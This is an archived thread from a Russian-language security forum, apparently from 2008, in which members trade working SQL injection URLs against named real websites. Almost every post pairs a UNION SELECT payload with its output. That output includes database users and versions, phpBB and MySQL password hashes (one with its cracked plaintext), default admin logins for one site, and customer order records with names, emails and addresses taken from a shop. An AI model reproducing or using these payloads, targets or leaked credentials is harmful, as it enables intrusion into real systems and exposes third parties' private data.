HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.02.2008, 22:51
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

mysql5
Цитата:
http://www.farmnetservices.com/agents/wi.php?ID=4%20union%20select%201,2,3,concat_ws(0x3 A,table_schema,TABLE_NAME),5,6,7,8,9,0,1,2,3,4,5,6 ,17+FROM+INFORMATION_SCHEMA.TABLES/*
Цитата:
http://poserpros.daz3d.com/store/merchstore.php?merch=337%20union%20select%201,2,3, 4,concat(user_password,char(58),username),6,7,8,9, 0,1,2,3,4,5,6,7%20FROM+phpbb_users/*
 
Ответить с цитированием

  #2  
Старый 28.02.2008, 23:01
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Ежедневная газета АНТИСПИД НАРКОСТОП
http://noaids.ru/print_news.php?id=-852+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2/*

user=samara63_noaids@localhost
database=samara63_noaids
version=5.0.45

http://www.cci.gomel.by/dop/print_news.php?id=-420+union+select+1,2,3,4,5,database(),7,8,9,10,11, 12/*

user=btpp@localhost
database=cci01
varsion=4.0.18

http://www.uprava.org/section.php?id=-34+union+select+1,DATABASE(),user(),4,5,6,7/*

user uprava-org@he2.hoster.ru
database uprava-org
varsion 4.0.27


http://www.zimaspb.ru/news.php?id_news=-19+union+select+1,user(),3,4,database(),6,version( )/*


http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,4,User(),DataBase(),version( ),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10 ,1,2,3,4,5,6,7,38/*

Последний раз редактировалось neon_fx; 29.02.2008 в 06:40..
 
Ответить с цитированием

  #3  
Старый 29.02.2008, 00:51
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Веломагазин

http://rider.dn.ua/news.php?id=11+union+select+1,2,concat(username,0x 3a,user_password),4,5+from+phpbb_users/*

root:63669023999824a9197274768beb958d

Последний раз редактировалось samarin; 29.02.2008 в 01:04..
 
Ответить с цитированием

  #4  
Старый 29.02.2008, 08:27
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Код:
http://atitlan-online.com/index.php?option=com_notebook&task=viewNote&id=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+ati_users/*
http://atitlan-online.com/administrator/
admin;admin
 
Ответить с цитированием

  #5  
Старый 29.02.2008, 16:51
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

research.ohiou.edu

Цитата:
http://www.research.ohiou.edu/index.php?section=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14--
user() = mediabrite@research.ohiou.edu
version() = 4.1.19-log
database() = vpresearch
 
Ответить с цитированием

  #6  
Старый 29.02.2008, 17:16
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

http://www.ifsociety.com/shop.php?id=99999+union+select+VERSION(),2,3,4,5,6 /*
Версия: 4.1.20-log
юзер: ifsociety@10.0.0.207
база: ifsociety
 
Ответить с цитированием

  #7  
Старый 29.02.2008, 17:48
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

_http://www.serbia-money.ru/ru/news.php?news=87
_http://www.serbia-money.ru/ru/news.php?news=87%27
_http://www.serbia-money.ru/ru/news.php?news=87+order+by+9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,5,6,7,8,9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,database(),user(),6,7,8,vers ion()/*

er.a_.serb
serbia_admin@localhost
5.0.45-community-log
 
Ответить с цитированием

  #8  
Старый 01.03.2008, 00:31
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Цитата:
Сообщение от Климент_Ворошилов  
_http://www.serbia-money.ru/ru/news.php?news=87
_http://www.serbia-money.ru/ru/news.php?news=87%27
_http://www.serbia-money.ru/ru/news.php?news=87+order+by+9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,5,6,7,8,9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,database(),user(),6,7,8,vers ion()/*

er.a_.serb
serbia_admin@localhost
5.0.45-community-log
Самое вкусное:
база таблица столбец
serbia_serbia zakaz id
serbia_serbia zakaz date_time
serbia_serbia zakaz fio_d
serbia_serbia zakaz tel_d
serbia_serbia zakaz address_d
serbia_serbia zakaz email_d
serbia_serbia zakaz zakaz

Пример:
http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,concat_ws(0x3a,id,date_tim e,fio_d,tel_d,address_d,email_d,zakaz),6,7,8,9+fro m+serbia_serbia.zakaz+limit+1+offset+1/*

2
2008-02-04 15:55:28:
vefv
vfevf
fee@mail.ru
fee@mail.ru:P0001 - 1 динар - 1шт. (2000 руб.)
Всего 1шт. на сумму 2000 руб
//******************************************

http://www.shopaware.com/product/product_detail.php?id=-134+union+select+1,2,3,version(),database(),user() ,7,8,9,10,11/*

4.0.27-standard-log 0
dbo204500512@74.208.16.93
//*********************************

http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,user(),3,database(),5,6,7,8,9,10 ,11,12,13,14,15,16,version()/*

[ 4.1.22-standard ]
jed_root@localhost
jed_jed

//***********************************
ТОЧНЫЙ ПРОГНОЗ ПОГОДЫ ДЛЯ ЛЮБОЙ ТОЧКИ УКРАИНЫ

http://meteoprog.com.ua/news.php?command=more&id_news=-64+union+select+1,2,database(),user(),5,6/*

4.1.22
meteoprog
meteoprog@localhost
//**********************************

Финансовая группа ИНТРАСТ

http://www.intrast.ru/news.php?id_news=-69339+union+select+1,2,concat(user,char(58),passwo rd),4,5+from+mysql.user+limit+1/*

login --> root
password --> 6e83ef3f5ae34aa4 -->gznfxjr

//************************************

http://zapravkin.com.ua/news.php?id_news=-49+union+select+1,2,3,4,5,6,7,version(),user(),10, 11,12,13,database()/*

mandrey_zap@localhost
mandrey_zap
4.0.27-standard-log

Последний раз редактировалось neon_fx; 01.03.2008 в 10:28..
 
Ответить с цитированием

  #9  
Старый 29.02.2008, 18:05
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

магазины
------------------
_http://www.lakkk.com/lib.php?lib_id=-29+union+select+database(),version(),user(),4,5/*

5.0.45-log - u90286_old
u90286@10.10.223.249

базы две u90286_old и u90286 доступ есть
-------------------
_http://www.gorshkov.ru/index.php?full=9999999+union+select+1,version(),3, user()/*&rand=21002

4.0.24_Debian-10sarge1-log
u664@localhost
u664_2

таблицы так и не подобрал
--------------------
 
Ответить с цитированием

  #10  
Старый 29.02.2008, 19:08
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

http://www.rtcmagazine.com/home/article.php?id=99999'+union+select+VERSION()/*

версия: 4.1.20

Юзер: rtcgroup@64.13.248.195

БАЗА : rtcgroup
===========================
http://fullhousemagazine.co.uk/compdets.php?id=99999+union+select+1,2,VERSION(),4 ,5,6,7,8,9,10,11,12,13,14,15,16/*

Мускул: 4.0.27-standard-log

Юзер: dbo205665539@212.227.119.170

База: db205665539
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ